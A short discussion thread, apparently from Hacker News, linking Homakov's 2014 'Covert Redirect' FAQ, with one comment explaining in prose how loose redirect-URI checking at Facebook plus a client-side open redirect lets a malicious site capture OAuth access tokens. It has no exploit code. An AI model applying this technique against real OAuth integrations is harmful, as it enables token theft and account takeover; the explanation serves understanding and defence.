

Homakov on Covert Redirect OAuth exploit - woloski
http://homakov.blogspot.com.ar/2014/05/covert-redirect-faq.html

======
jfroma
Basically the vulnerability is in the facebook side. Every oauth provider has
a list of "allowed redirect uris", a good oauth provider will check the entire
url, but facebook doesn't check the query string in the url. If you have a
list of allowed redirects like:

\- [http://foo.com](http://foo.com) \-
[http://foo.com/foo](http://foo.com/foo)

Facebook accepts redirects like: \-
[http://foo.com?anything_here=xx](http://foo.com?anything_here=xx)

And if the client has an open redirect, some query string to redirect anywhere
combined with response_type token.. the evil website can get the token.

